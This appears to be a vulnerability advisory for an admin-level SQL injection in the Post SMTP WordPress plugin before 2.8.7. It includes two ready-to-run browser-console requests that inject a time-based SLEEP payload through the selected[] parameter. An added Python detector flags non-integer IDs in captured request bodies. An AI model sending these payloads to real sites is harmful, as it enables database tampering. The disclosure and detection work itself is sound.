Type: wpexploit
Author: Alex Sanford
ID: WPEX-ID:AB5C42CA-EE7D-4344-BD88-0D727ED3D9C4
History: Dec 21, 2023 - 12:00 a.m.

Post SMTP < 2.8.7 - Admin+ SQL Injection

Tags: ps-delete-email-logs, ps-export-email-logs, sql injection, admin+ security, wordpress, browser console

AI Score: 7.3 (Confidence: High)

EPSS: 0.001 (Percentile: 19.3%)

Description

The plugin does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high privilege users such as admin.

# In `ps-delete-email-logs` action:

Visit the Post SMTP > Email Log page and run the following code in the browser console:

```js
nonce = document.getElementById('ps-email-log-nonce').value

await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-Fetch-Site": "same-origin"
    },
    "body": "action=ps-delete-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
    "method": "POST",
    "mode": "cors"
});
```

# In `ps-export-email-logs` action:

Visit the Post SMTP > Email Log page and run the following code in the browser console:

```js
nonce = document.getElementById('ps-email-log-nonce').value

await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-Fetch-Site": "same-origin"
    },
    "body": "action=ps-export-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
    "method": "POST",
    "mode": "cors"
});
```
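
A defensive check for the two actions above, as an added example that is not part of the original advisory or the plugin's own code: it parses captured form-encoded POST bodies and flags any `selected` array value that is not a plain integer. It assumes the parameter is meant to carry numeric email-log IDs and that request bodies are available from a proxy or WAF audit log; the function names and sample bodies are constructed for illustration.

```python
from urllib.parse import parse_qsl

# Actions named in the advisory; the parameter name is taken from the PoC body.
WATCHED_ACTIONS = {"ps-delete-email-logs", "ps-export-email-logs"}


def is_id_param(key: str) -> bool:
    """Match selected, selected[] and selected[0]-style keys (PHP array forms)."""
    return key == "selected" or (key.startswith("selected[") and key.endswith("]"))


def non_integer_ids(body: str) -> list[str]:
    """Return decoded selected[] values that are not plain decimal integers.

    Assumption: IDs are numeric. Returns [] for other actions or clean requests.
    """
    fields = parse_qsl(body, keep_blank_values=True)
    if not any(k == "action" and v in WATCHED_ACTIONS for k, v in fields):
        return []
    return [v for k, v in fields
            if is_id_param(k) and not (v.isascii() and v.isdigit())]


def scan(bodies: list[str]) -> list[tuple[int, list[str]]]:
    """Return (index, offending values) for every body that fails the check."""
    return [(i, bad) for i, body in enumerate(bodies)
            if (bad := non_integer_ids(body))]


# Constructed sample bodies; NONCE is a placeholder. The second one reuses the
# selected[] value shown in the advisory's request.
SAMPLE_BODIES = [
    "action=ps-delete-email-logs&security=NONCE&selected%5B%5D=12&selected%5B%5D=13",
    "action=ps-export-email-logs&security=NONCE"
    "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
    "action=heartbeat&selected%5B%5D=abc",  # unrelated action, ignored
]

if __name__ == "__main__":
    for index, bad in scan(SAMPLE_BODIES):
        print(f"body {index}: non-integer id value(s): {bad!r}")
```

The same integer-only rule is what server-side validation of this parameter would enforce before the value reaches a SQL statement.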
